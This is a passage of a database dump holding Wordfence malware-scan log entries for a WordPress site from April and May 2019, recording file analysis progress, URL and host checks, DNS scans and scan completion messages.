far'),(29922,1556439985.248370,2,'info','Analyzed 2000 files containing 42.33 MB of data so far'),(29523,1555916717.424044,2,'info','Analyzed 5700 files containing 102.57 MB of data so far'),(30132,1556693608.358689,2,'info','Analyzed 900 files containing 14.7 MB of data so far'),(29711,1556175080.210629,2,'info','Analyzed 2800 files containing 55.53 MB of data so far'),(29710,1556175080.021343,2,'info','Analyzed 2700 files containing 54.99 MB of data so far'),(30244,1556693683.445137,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blacklist'),(30243,1556693683.442107,2,'info','Done examining URLs'),(29170,1555656705.686091,2,'info','The disk has 116979.66 MB available'),(29775,1556175114.127535,2,'info','Scanned contents of 63 additional files at 30.55 per second'),(29776,1556175115.215258,2,'info','Scanned contents of 76 additional files at 24.13 per second'),(30133,1556693608.815793,2,'info','Analyzed 1000 files containing 17.99 MB of data so far'),(30134,1556693609.448354,2,'info','Analyzed 1100 files containing 20.74 MB of data so far'),(30135,1556693611.061987,2,'info','Analyzed 1200 files containing 27.48 MB of data so far'),(30136,1556693611.415747,2,'info','Analyzed 1300 files containing 28.93 MB of data so far'),(29733,1556175095.309382,2,'info','Analyzed 5000 files containing 95.5 MB of data so far'),(29734,1556175095.536100,2,'info','Analyzed 5100 files containing 96.29 MB of data so far'),(29135,1555550594.128226,1,'info','Initiating quick scan'),(29640,1556175057.614172,2,'info','Starting DNS scan for ashbyresort.com'),(30052,1556592797.052027,1,'info','Initiating quick scan'),(29381,1555656836.049525,2,'info','Wordfence used 25.64 MB of memory for scan. Server peak memory usage was: 83.64 MB'),(29568,1555916748.517150,2,'info','Asking Wordfence to check URLs against malware list.'),(29569,1555916748.523356,2,'info','Checking 1118 host keys against Wordfence scanning servers.'),(29570,1555916748.934390,2,'info','Done host key check.'),(29571,1555916748.935593,2,'info','Checking 1 URLs from 1 sources.'),(29572,1555916749.240960,2,'info','Done URL check.'),(30077,1556693571.079182,10,'info','SUM_START:Checking for the most secure way to get IPs'),(29612,1556069650.379622,1,'info','Initiating quick scan'),(30245,1556693683.454110,10,'info','SUM_START:Scanning comments for URLs on a domain blacklist'),(29765,1556175110.916797,2,'info','Analyzed 8113 files containing 146.75 MB of data.'),(29742,1556175098.970608,2,'info','Analyzed 5900 files containing 108.4 MB of data so far'),(29668,1556175059.352836,2,'info','1000 files indexed'),(29669,1556175059.895737,2,'info','1500 files indexed'),(29105,1555397986.415602,2,'info','Done examining URLs'),(29104,1555397986.411852,2,'info','Done host key check.'),(29103,1555397986.093245,2,'info','Checking 2 host keys against Wordfence scanning servers.'),(29102,1555397986.092585,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(29670,1556175060.026382,2,'info','2000 files indexed'),(29671,1556175060.296703,2,'info','2500 files indexed'),(29672,1556175060.688666,2,'info','3000 files indexed'),(29673,1556175060.956846,2,'info','3500 files indexed'),(29674,1556175061.084813,2,'info','4000 files indexed'),(29675,1556175061.178808,2,'info','4500 files indexed'),(29676,1556175061.522467,2,'info','5000 files indexed'),(29677,1556175061.587237,2,'info','5500 files indexed'),(29678,1556175061.739220,2,'info','6000 files indexed'),(30143,1556693614.868780,2,'info','Analyzed 2000 files containing 42.33 MB of data so far'),(30142,1556693614.667581,2,'info','Analyzed 1900 files containing 41.82 MB of data so far'),(30141,1556693614.278002,2,'info','Analyzed 1800 files containing 40.45 MB of data so far'),(30140,1556693614.099398,2,'info','Analyzed 1700 files containing 39.82 MB of data so far'),(30139,1556693613.937588,2,'info','Analyzed 1600 files containing 39.37 MB of data so far'),(30138,1556693613.067234,2,'info','Analyzed 1500 files containing 35.08 MB of data so far'),(30137,1556693611.981854,2,'info','Analyzed 1400 files containing 31.02 MB of data so far'),(29416,1555916673.873918,1,'info','Contacting Wordfence to initiate scan'),(29526,1555916718.809600,2,'info','Analyzed 6000 files containing 108.97 MB of data so far'),(29121,1555397993.506454,2,'info','Wordfence used 28.14 MB of memory for scan. Server peak memory usage was: 86.14 MB'),(30045,1556502011.905798,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(29120,1555397993.505726,1,'info','-------------------'),(29385,1555723124.612058,1,'info','Initiating quick scan'),(30034,1556440055.602756,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(30035,1556440055.603207,2,'info','Done examining URLs'),(30036,1556440055.604626,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(30037,1556440055.610520,1,'info','-------------------'),(29221,1555656720.748347,2,'info','Analyzed 1500 files containing 35.08 MB of data so far'),(29220,1555656719.923048,2,'info','Analyzed 1400 files containing 31.02 MB of data so far'),(29218,1555656719.043301,2,'info','Analyzed 1200 files containing 27.48 MB of data so far'),(29219,1555656719.443276,2,'info','Analyzed 1300 files containing 28.93 MB of data so far'),(29989,1556440020.704481,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(29494,1555916702.298004,2,'info','Analyzed 2800 files containing 55.53 MB of data so far'),(29736,1556175096.014328,2,'info','Analyzed 5300 files containing 97.13 MB of data so far'),(29735,1556175095.782395,2,'info','Analyzed 5200 files containing 96.78 MB of data so far'),(29333,1555656803.810778,2,'info','Scanned contents of 571 additional files at 11.77 per second'),(29457,1555916685.292221,2,'info','4000 files indexed'),(29458,1555916685.366201,2,'info','4500 files indexed'),(29453,1555916684.122924,2,'info','2000 files indexed'),(29454,1555916684.397752,2,'info','2500 files indexed'),(29455,1555916684.844385,2,'info','3000 files indexed'),(29456,1555916685.124539,2,'info','3500 files indexed'),(30156,1556693624.508550,2,'info','Analyzed 3300 files containing 64.02 MB of data so far'),(30155,1556693620.989136,2,'info','Analyzed 3200 files containing 62.33 MB of data so far'),(29382,1555656836.049922,1,'info','Scan Complete. Scanned 7917 files, 21 plugins, 8 themes, 21 posts, 0 comments and 1128 URLs in 2 minutes 18 seconds.'),(29883,1556439964.909513,10,'info','SUM_DISABLED:Skipping plugin scan'),(29879,1556439964.902336,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(29880,1556439964.903661,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(29881,1556439964.907015,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(29882,1556439964.909100,10,'info','SUM_DISABLED:Skipping theme scan'),(30253,1556693688.701482,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(30254,1556693688.711282,10,'info','SUM_START:Scanning for suspicious site options'),(30255,1556693688.729693,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(30256,1556693688.730448,2,'info','Done examining URLs'),(30257,1556693688.733783,10,'info','SUM_ENDOK:Scanning for suspicious site options'),(29813,1556175136.080262,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(29642,1556175057.849503,2,'info','Scanning DNS MX record for ashbyresort.com'),(29641,1556175057.845616,2,'info','Scanning DNS A record for ashbyresort.com'),(29130,1555468176.758293,1,'info','-------------------'),(29131,1555468176.759308,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(30228,1556693681.977865,2,'info','Scanned contents of 262 additional files at 12.00 per second'),(29132,1555468176.759647,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30229,1556693681.978384,2,'info','Asking Wordfence to check URLs against malware list.'),(30230,1556693681.992624,2,'info','Checking 1118 host keys against Wordfence scanning servers.'),(29195,1555656707.078890,2,'info','2500 files indexed'),(29782,1556175121.367137,2,'info','Scanned contents of 212 additional files at 22.79 per second'),(29783,1556175125.488484,2,'info','Scanned contents of 233 additional files at 17.36 per second'),(29337,1555656810.185281,2,'info','Scanned contents of 617 additional files at 11.24 per second'),(29788,1556175130.583118,2,'info','Checking 1118 host keys against Wordfence scanning servers.'),(30237,1556693683.097924,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(29197,1555656707.540171,2,'info','3500 files indexed'),(29198,1555656707.677646,2,'info','4000 files indexed'),(29196,1555656707.275335,2,'info','3000 files indexed'),(29594,1555916752.920518,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(30094,1556693580.501189,2,'info','Getting theme list from WordPress'),(30095,1556693580.694203,2,'info','Found 8 themes'),(30096,1556693580.707159,10,'info','SUM_START:Fetching core, theme and plugin file signatures from Wordfence'),(30097,1556693581.638677,10,'info','SUM_ENDSUCCESS:Fetching core, theme and plugin file signatures from Wordfence'),(30098,1556693581.644119,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(30099,1556693581.649075,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(29911,1556439979.207216,2,'info','Analyzed 900 files containing 14.7 MB of data so far'),(29355,1555656830.455818,2,'info','Done URL check.'),(29356,1555656830.461004,2,'info','Done file contents scan'),(29679,1556175062.004185,2,'info','6500 files indexed'),(29680,1556175062.412522,2,'info','7000 files indexed'),(29681,1556175063.811797,2,'info','7500 files indexed'),(30204,1556693656.400929,2,'info','Analyzed 8100 files containing 146.42 MB of data so far'),(29705,1556175077.778210,2,'info','Analyzed 2200 files containing 46.58 MB of data so far'),(29706,1556175078.010030,2,'info','Analyzed 2300 files containing 47.53 MB of data so far'),(29704,1556175077.098962,2,'info','Analyzed 2100 files containing 43.52 MB of data so far'),(30224,1556693671.598126,2,'info','Scanned contents of 208 additional files at 18.16 per second'),(29703,1556175076.782125,2,'info','Analyzed 2000 files containing 42.33 MB of data so far'),(29702,1556175076.572225,2,'info','Analyzed 1900 files containing 41.82 MB of data so far'),(29519,1555916715.828118,2,'info','Analyzed 5300 files containing 97.13 MB of data so far'),(29518,1555916715.675713,2,'info','Analyzed 5200 files containing 96.78 MB of data so far'),(29517,1555916715.471458,2,'info','Analyzed 5100 files containing 96.29 MB of data so far'),(29342,1555656815.329807,2,'info','Scanned contents of 705 additional files at 11.75 per second'),(29341,1555656814.315336,2,'info','Scanned contents of 692 additional files at 11.73 per second'),(30073,1556693564.494689,1,'info','Contacting Wordfence to initiate scan'),(29340,1555656813.275927,2,'info','Scanned contents of 676 additional files at 11.66 per second'),(30238,1556693683.101054,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(29545,1555916729.045551,2,'info','Analyzed 7900 files containing 141.41 MB of data so far'),(29546,1555916729.693710,2,'info','Analyzed 8000 files containing 144.65 MB of data so far'),(29235,1555656727.463750,2,'info','Analyzed 2900 files containing 60.77 MB of data so far'),(29234,1555656726.113322,2,'info','Analyzed 2800 files containing 55.53 MB of data so far'),(29780,1556175119.317750,2,'info','Scanned contents of 164 additional files at 22.61 per second'),(29846,1556414237.257755,1,'info','-------------------'),(29847,1556414237.259262,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29414,1555916670.851624,1,'info','Scheduled Wordfence scan starting at Monday 22nd of April 2019 02:04:30 AM'),(29985,1556440020.609714,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(29984,1556440020.609314,2,'info','Analyzed 8113 files containing 146.74 MB of data.'),(29524,1555916718.441567,2,'info','Analyzed 5800 files containing 107.75 MB of data so far'),(29525,1555916718.620576,2,'info','Analyzed 5900 files containing 108.4 MB of data so far'),(29983,1556440020.563908,2,'info','Analyzed 8100 files containing 146.47 MB of data so far'),(29779,1556175118.298239,2,'info','Scanned contents of 131 additional files at 21.02 per second'),(30190,1556693648.596255,2,'info','Analyzed 6700 files containing 121.76 MB of data so far'),(30189,1556693647.876884,2,'info','Analyzed 6600 files containing 119.74 MB of data so far'),(30188,1556693647.097882,2,'info','Analyzed 6500 files containing 117.72 MB of data so far'),(30187,1556693645.925605,2,'info','Analyzed 6400 files containing 115.47 MB of data so far'),(30186,1556693645.535700,2,'info','Analyzed 6300 files containing 114.08 MB of data so far'),(30185,1556693645.024610,2,'info','Analyzed 6200 files containing 112.18 MB of data so far'),(30184,1556693644.214840,2,'info','Analyzed 6100 files containing 109.46 MB of data so far'),(30183,1556693643.812939,2,'info','Analyzed 6000 files containing 108.97 MB of data so far'),(30182,1556693643.379147,2,'info','Analyzed 5900 files containing 108.4 MB of data so far'),(30181,1556693643.105087,2,'info','Analyzed 5800 files containing 107.75 MB of data so far'),(30180,1556693638.853919,2,'info','Analyzed 5700 files containing 102.57 MB of data so far'),(29608,1555982404.634273,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29609,1555982404.634678,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(29094,1555397985.544159,2,'info','Checking 488 host keys against Wordfence scanning servers.'),(29786,1556175130.575305,2,'info','Scanned contents of 262 additional files at 14.15 per second'),(29241,1555656729.701146,2,'info','Analyzed 3500 files containing 67.68 MB of data so far'),(29240,1555656729.173650,2,'info','Analyzed 3400 files containing 65.34 MB of data so far'),(29239,1555656728.722905,2,'info','Analyzed 3300 files containing 64.02 MB of data so far'),(29236,1555656727.711463,2,'info','Analyzed 3000 files containing 61.18 MB of data so far'),(29237,1555656727.927127,2,'info','Analyzed 3100 files containing 61.65 MB of data so far'),(29238,1555656728.310846,2,'info','Analyzed 3200 files containing 62.33 MB of data so far'),(30265,1556760493.298494,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(30086,1556693580.443532,2,'info','The disk has 105111.45 MB available'),(30087,1556693580.444120,10,'info','SUM_ENDOK:Scanning to check available disk space'),(30015,1556440046.624671,10,'info','SUM_ENDOK:Scanning file contents for URLs on a domain blacklist'),(30014,1556440046.617961,10,'info','SUM_ENDOK:Scanning file contents for infections and vulnerabilities'),(29806,1556175131.675425,2,'info','Starting password strength check on 2 users.'),(29378,1555656836.031685,2,'info','Done examining URLs'),(29874,1556439963.990967,2,'info','Found 8 themes'),(29380,1555656836.048699,1,'info','-------------------'),(30053,1556592797.054691,10,'info','SUM_START:Checking Web Application Firewall status'),(30054,1556592797.055573,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(29325,1555656795.568404,2,'info','Scanned contents of 456 additional files at 11.33 per second'),(29324,1555656794.558026,2,'info','Scanned contents of 438 additional files at 11.16 per second'),(30233,1556693683.073764,2,'info','Done URL check.'),(30232,1556693682.400356,2,'info','Checking 1 URLs from 1 sources.'),(29801,1556175131.639391,2,'info','Done examining URLs'),(29301,1555656762.526250,2,'info','Scanned contents of 111 additional files at 15.37 per second'),(29302,1555656763.639120,2,'info','Scanned contents of 123 additional files at 14.76 per second'),(29774,1556175113.100923,2,'info','Scanned contents of 19 additional files at 18.35 per second'),(29250,1555656736.957550,2,'info','Analyzed 4400 files containing 84.79 MB of data so far'),(30033,1556440055.597511,10,'info','SUM_START:Scanning for suspicious site options'),(30032,1556440055.590769,10,'info','SUM_ENDOK:Scanning for admin users not created through WordPress'),(30270,1556760493.343254,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30268,1556760493.341885,1,'info','-------------------'),(30269,1556760493.342939,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29390,1555723124.661184,1,'info','-------------------'),(29391,1555723124.662720,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29285,1555656753.875491,2,'info','Analyzed 7900 files containing 138.16 MB of data so far'),(29284,1555656753.504092,2,'info','Analyzed 7800 files containing 136.05 MB of data so far'),(29283,1555656749.590521,2,'info','Analyzed 7700 files containing 133.03 MB of data so far'),(29282,1555656748.615741,2,'info','Analyzed 7600 files containing 130.7 MB of data so far'),(29281,1555656747.974392,2,'info','Analyzed 7500 files containing 128.63 MB of data so far'),(29280,1555656747.655753,2,'info','Analyzed 7400 files containing 127.48 MB of data so far'),(29279,1555656747.363669,2,'info','Analyzed 7300 files containing 125.87 MB of data so far'),(29278,1555656746.998095,2,'info','Analyzed 7200 files containing 123.73 MB of data so far'),(29276,1555656746.110798,2,'info','Analyzed 7000 files containing 119.28 MB of data so far'),(29277,1555656746.585326,2,'info','Analyzed 7100 files containing 122.37 MB of data so far'),(29268,1555656743.004614,2,'info','Analyzed 6200 files containing 107.14 MB of data so far'),(29930,1556439988.731903,2,'info','Analyzed 2800 files containing 55.53 MB of data so far'),(29364,1555656830.838133,2,'info','Done host key check.'),(29534,1555916722.274810,2,'info','Analyzed 6800 files containing 123.29 MB of data so far'),(29533,1555916721.842444,2,'info','Analyzed 6700 files containing 121.76 MB of data so far'),(29363,1555656830.526063,2,'info','Checking 2 host keys against Wordfence scanning servers.'),(29536,1555916722.530962,2,'info','Analyzed 7000 files containing 123.48 MB of data so far'),(29535,1555916722.405501,2,'info','Analyzed 6900 files containing 123.46 MB of data so far'),(29841,1556414237.223645,1,'info','Initiating quick scan'),(29764,1556175110.862788,2,'info','Analyzed 8100 files containing 146.48 MB of data so far'),(29763,1556175110.667635,2,'info','Analyzed 8000 files containing 144.61 MB of data so far'),(29762,1556175109.578551,2,'info','Analyzed 7900 files containing 141.36 MB of data so far'),(29761,1556175108.721033,2,'info','Analyzed 7800 files containing 139.06 MB of data so far'),(29760,1556175108.184020,2,'info','Analyzed 7700 files containing 136.96 MB of data so far'),(29759,1556175107.952964,2,'info','Analyzed 7600 files containing 135.8 MB of data so far'),(29560,1555916735.549293,2,'info','Scanned contents of 106 additional files at 23.94 per second'),(29559,1555916734.526365,2,'info','Scanned contents of 84 additional files at 24.67 per second'),(29558,1555916733.490659,2,'info','Scanned contents of 71 additional files at 29.96 per second'),(29313,1555656779.302010,2,'info','Scanned contents of 292 additional files at 12.17 per second'),(30191,1556693649.296080,2,'info','Analyzed 6800 files containing 123.29 MB of data so far'),(30067,1556673595.067154,1,'info','-------------------'),(30068,1556673595.068252,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29336,1555656806.980255,2,'info','Scanned contents of 616 additional files at 11.92 per second'),(30069,1556673595.068766,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30070,1556673595.069046,10,'info','SUM_FINAL:Scan complete. You have 5 new issues to fix. See below.'),(29622,1556155349.459145,1,'info','Initiating quick scan'),(30071,1556693559.690330,1,'info','Scheduled Wordfence scan starting at Wednesday 1st of May 2019 01:52:39 AM'),(30060,1556592797.083185,10,'info','SUM_FINAL:Scan complete. You have 3 new issues to fix. See below.'),(29144,1555637228.275593,2,'error','GeoIP Error: Undefined offset: 101'),(29695,1556175072.466687,2,'info','Analyzed 1200 files containing 27.48 MB of data so far'),(29694,1556175071.051905,2,'info','Analyzed 1100 files containing 20.74 MB of data so far'),(29212,1555656712.170030,2,'info','Analyzed 600 files containing 9.08 MB of data so far'),(29251,1555656737.096536,2,'info','Analyzed 4500 files containing 84.93 MB of data so far'),(30006,1556440045.865348,2,'info','Scanned contents of 262 additional files at 11.14 per second'),(30003,1556440039.135721,2,'info','Scanned contents of 218 additional files at 12.99 per second'),(30004,1556440040.155621,2,'info','Scanned contents of 244 additional files at 13.70 per second'),(30005,1556440044.857997,2,'info','Scanned contents of 256 additional files at 11.37 per second'),(30223,1556693670.575064,2,'info','Scanned contents of 193 additional files at 18.50 per second'),(29753,1556175103.291458,2,'info','Analyzed 7000 files containing 123.48 MB of data so far'),(29754,1556175103.561105,2,'info','Analyzed 7100 files containing 123.87 MB of data so far'),(29755,1556175106.522449,2,'info','Analyzed 7200 files containing 127.65 MB of data so far'),(29756,1556175106.926925,2,'info','Analyzed 7300 files containing 130.82 MB of data so far'),(29757,1556175107.289945,2,'info','Analyzed 7400 files containing 132.05 MB of data so far'),(29758,1556175107.668658,2,'info','Analyzed 7500 files containing 134.36 MB of data so far'),(29541,1555916724.590085,2,'info','Analyzed 7500 files containing 134.4 MB of data so far'),(29351,1555656829.699182,2,'info','Asking Wordfence to check URLs against malware list.'),(29542,1555916724.849211,2,'info','Analyzed 7600 files containing 135.84 MB of data so far'),(29543,1555916725.041049,2,'info','Analyzed 7700 files containing 137 MB of data so far'),(29350,1555656829.698782,2,'info','Scanned contents of 855 additional files at 11.49 per second'),(29096,1555397986.004788,2,'info','Done file contents scan'),(29717,1556175083.074253,2,'info','Analyzed 3400 files containing 65.34 MB of data so far'),(29718,1556175083.612114,2,'info','Analyzed 3500 files containing 67.68 MB of data so far'),(29719,1556175089.291693,2,'info','Analyzed 3600 files containing 80.66 MB of data so far'),(29617,1556069650.422404,1,'info','-------------------'),(29618,1556069650.423322,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29338,1555656811.237620,2,'info','Scanned contents of 653 additional files at 11.67 per second'),(29339,1555656812.275023,2,'info','Scanned contents of 665 additional files at 11.67 per second'),(30072,1556693564.482707,10,'info','SUM_PREP:Preparing a new scan.'),(29619,1556069650.423818,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30174,1556693636.452298,2,'info','Analyzed 5100 files containing 96.29 MB of data so far'),(30173,1556693636.214911,2,'info','Analyzed 5000 files containing 95.5 MB of data so far'),(30172,1556693635.834014,2,'info','Analyzed 4900 files containing 93.95 MB of data so far'),(30171,1556693635.550767,2,'info','Analyzed 4800 files containing 92.64 MB of data so far'),(30170,1556693634.450625,2,'info','Analyzed 4700 files containing 87.35 MB of data so far'),(30169,1556693632.991633,2,'info','Analyzed 4600 files containing 85.39 MB of data so far'),(30168,1556693632.336528,2,'info','Analyzed 4500 files containing 84.93 MB of data so far'),(30167,1556693631.932259,2,'info','Analyzed 4400 files containing 84.79 MB of data so far'),(30164,1556693630.327725,2,'info','Analyzed 4100 files containing 82.93 MB of data so far'),(30165,1556693630.912891,2,'info','Analyzed 4200 files containing 83.23 MB of data so far'),(30166,1556693631.143510,2,'info','Analyzed 4300 files containing 83.46 MB of data so far'),(29483,1555916698.205927,2,'info','Analyzed 1700 files containing 39.82 MB of data so far'),(29482,1555916698.028213,2,'info','Analyzed 1600 files containing 39.37 MB of data so far'),(30218,1556693665.535485,2,'info','Scanned contents of 103 additional files at 19.11 per second'),(30217,1556693664.531102,2,'info','Scanned contents of 84 additional files at 19.15 per second'),(30219,1556693666.546955,2,'info','Scanned contents of 113 additional files at 17.65 per second'),(29334,1555656804.924210,2,'info','Scanned contents of 583 additional files at 11.75 per second'),(29335,1555656805.940498,2,'info','Scanned contents of 596 additional files at 11.77 per second'),(29821,1556241606.348454,1,'info','Initiating quick scan'),(29485,1555916698.692587,2,'info','Analyzed 1900 files containing 41.82 MB of data so far'),(29484,1555916698.383049,2,'info','Analyzed 1800 files containing 40.45 MB of data so far'),(30163,1556693629.943844,2,'info','Analyzed 4000 files containing 82.38 MB of data so far'),(30162,1556693629.538901,2,'info','Analyzed 3900 files containing 82.06 MB of data so far'),(30161,1556693629.244403,2,'info','Analyzed 3800 files containing 81.59 MB of data so far'),(30157,1556693625.037580,2,'info','Analyzed 3400 files containing 65.34 MB of data so far'),(30158,1556693625.685940,2,'info','Analyzed 3500 files containing 67.68 MB of data so far'),(30159,1556693628.416675,2,'info','Analyzed 3600 files containing 80.66 MB of data so far'),(30160,1556693628.902204,2,'info','Analyzed 3700 files containing 81.39 MB of data so far'),(29778,1556175117.283671,2,'info','Scanned contents of 109 additional files at 20.89 per second'),(29777,1556175116.223463,2,'info','Scanned contents of 95 additional files at 22.85 per second'),(29781,1556175120.332485,2,'info','Scanned contents of 191 additional files at 23.10 per second'),(29503,1555916711.279697,2,'info','Analyzed 3700 files containing 81.39 MB of data so far'),(30154,1556693620.606581,2,'info','Analyzed 3100 files containing 61.65 MB of data so far'),(30153,1556693620.186098,2,'info','Analyzed 3000 files containing 61.18 MB of data so far'),(30152,1556693619.861504,2,'info','Analyzed 2900 files containing 60.77 MB of data so far'),(30151,1556693618.476634,2,'info','Analyzed 2800 files containing 55.53 MB of data so far'),(30150,1556693618.270937,2,'info','Analyzed 2700 files containing 54.99 MB of data so far'),(30149,1556693617.996383,2,'info','Analyzed 2600 files containing 54.4 MB of data so far'),(30148,1556693617.462236,2,'info','Analyzed 2500 files containing 53.52 MB of data so far'),(29095,1555397985.967344,2,'info','Done host key check.'),(29311,1555656777.245853,2,'info','Scanned contents of 257 additional files at 11.71 per second'),(29303,1555656764.671113,2,'info','Scanned contents of 131 additional files at 13.99 per second'),(29304,1555656765.780579,2,'info','Scanned contents of 138 additional files at 13.17 per second'),(29305,1555656766.819212,2,'info','Scanned contents of 151 additional files at 13.11 per second'),(29306,1555656767.832584,2,'info','Scanned contents of 158 additional files at 12.61 per second'),(29307,1555656773.180612,2,'info','Scanned contents of 165 additional files at 9.23 per second'),(29308,1555656774.192305,2,'info','Scanned contents of 174 additional files at 9.21 per second'),(29309,1555656775.225737,2,'info','Scanned contents of 196 additional files at 9.84 per second'),(29310,1555656776.244988,2,'info','Scanned contents of 227 additional files at 10.84 per second'),(29217,1555656717.656397,2,'info','Analyzed 1100 files containing 20.74 MB of data so far'),(29216,1555656717.064099,2,'info','Analyzed 1000 files containing 17.99 MB of data so far'),(29215,1555656713.691242,2,'info','Analyzed 900 files containing 14.7 MB of data so far'),(29214,1555656713.367111,2,'info','Analyzed 800 files containing 14.37 MB of data so far'),(29213,1555656712.522787,2,'info','Analyzed 700 files containing 10.33 MB of data so far'),(30023,1556440047.124402,10,'info','SUM_ENDOK:Scanning posts for URLs on a domain blacklist'),(30022,1556440047.122067,2,'info','Done examining URLs'),(30021,1556440047.121443,2,'info','Done host key check.'),(30016,1556440046.638593,10,'info','SUM_START:Scanning for publicly accessible quarantined files'),(30017,1556440046.649789,10,'info','SUM_ENDOK:Scanning for publicly accessible quarantined files'),(30018,1556440046.659991,10,'info','SUM_START:Scanning posts for URLs on a domain blacklist'),(30019,1556440046.772287,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(30020,1556440046.772990,2,'info','Checking 2 host keys against Wordfence scanning servers.'),(29227,1555656722.795959,2,'info','Analyzed 2100 files containing 43.52 MB of data so far'),(29791,1556175131.274657,2,'info','Done URL check.'),(29792,1556175131.279180,2,'info','Done file contents scan'),(29332,1555656802.777743,2,'info','Scanned contents of 556 additional files at 11.71 per second'),(29628,1556155349.497889,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29223,1555656721.736360,2,'info','Analyzed 1700 files containing 39.82 MB of data so far'),(29224,1555656721.957329,2,'info','Analyzed 1800 files containing 40.45 MB of data so far'),(29689,1556175066.147150,2,'info','Analyzed 600 files containing 9.08 MB of data so far'),(29688,1556175065.622893,2,'info','Analyzed 500 files containing 6.73 MB of data so far'),(29687,1556175065.384637,2,'info','Analyzed 400 files containing 5.97 MB of data so far'),(29686,1556175064.991686,2,'info','Analyzed 300 files containing 3.8 MB of data so far'),(29685,1556175064.711289,2,'info','Analyzed 200 files containing 2.44 MB of data so far'),(29079,1555397966.262040,2,'info','Starting scan of file contents'),(29080,1555397967.403745,2,'info','Scanned contents of 7 additional files at 6.14 per second'),(29474,1555916693.027127,2,'info','Analyzed 800 files containing 14.37 MB of data so far'),(30280,1556846991.242210,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(29852,1556439956.275443,1,'info','Contacting Wordfence to initiate scan'),(29405,1555896206.028164,1,'info','Initiating quick scan'),(30279,1556846991.241896,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(29402,1555809701.068150,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(30278,1556846991.240999,1,'info','-------------------'),(29400,1555809701.067235,1,'info','-------------------'),(29401,1555809701.067924,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 58 MB'),(30277,1556846991.236728,10,'info','SUM_ENDBAD:Scanning for old themes, plugins and core files'),(30276,1556846991.213677,10,'info','SUM_START:Scanning for old themes, plugins and core files'),(30275,1556846991.209543,10,'info','SUM_ENDOK:Checking Web Application Firewall status'),(30274,1556846991.209022,10,'info','SUM_START:Checking Web Application Firewall status'),(30273,1556846991.206384,1,'info','Initiating quick scan'),(29859,1556439962.721552,2,'info','Starting DNS scan for ashbyresort.com'),(29860,1556439963.798738,2,'info','Scanning DNS A record for ashbyresort.com'),(29683,1556175064.106671,2,'info','8113 files indexed'),(29682,1556175064.099736,2,'info','8000 files indexed'),(29945,1556440000.796873,2,'info','Analyzed 4300 files containing 83.46 MB of data so far'),(29946,1556440001.287225,2,'info','Analyzed 4400 files containing 84.79 MB of data so far'),(29947,1556440001.547964,2,'info','Analyzed 4500 files containing 84.93 MB of data so far'),(30258,1556693688.741329,1,'info','-------------------'),(30259,1556693688.742052,2,'info','Wordfence used 27.91 MB of memory for scan. Server peak memory usage was: 85.91 MB'),(29785,1556175130.017966,2,'info','Scanned contents of 256 additional files at 14.26 per second'),(29684,1556175064.420769,2,'info','Analyzed 100 files containing 1.36 MB of data so far'),(30010,1556440046.294997,2,'info','Done host key check.'),(30011,1556440046.296757,2,'info','Checking 1 URLs from 1 sources.'),(30012,1556440046.610062,2,'info','Done URL check.'),(30013,1556440046.615332,2,'info','Done file contents scan'),(29564,1555916739.674239,2,'info','Scanned contents of 197 additional files at 23.03 per second'),(29565,1555916740.689439,2,'info','Scanned contents of 231 additional files at 24.14 per second'),(30009,1556440045.895772,2,'info','Checking 1118 host keys against Wordfence scanning servers.'),(29544,1555916725.509920,2,'info','Analyzed 7800 files containing 139.1 MB of data so far'),(29495,1555916703.570585,2,'info','Analyzed 2900 files containing 60.77 MB of data so far'),(29496,1555916703.838823,2,'info','Analyzed 3000 files containing 61.18 MB of data so far'),(29169,1555656705.685715,2,'info','Total disk space: 5.41 TB -- Free disk space: 114.24 GB'),(30076,1556693569.071468,10,'info','SUM_PAIDONLY:Checking if your site is on a domain blacklist is for paid members only'),(29933,1556439990.368788,2,'info','Analyzed 3100 files containing 61.65 MB of data so far'),(29934,1556439990.650308,2,'info','Analyzed 3200 files containing 62.33 MB of data so far'),(29935,1556439994.571653,2,'info','Analyzed 3300 files containing 64.02 MB of data so far'),(29936,1556439995.024095,2,'info','Analyzed 3400 files containing 65.34 MB of data so far'),(29937,1556439995.750592,2,'info','Analyzed 3500 files containing 67.68 MB of data so far'),(29938,1556439998.528614,2,'info','Analyzed 3600 files containing 80.66 MB of data so 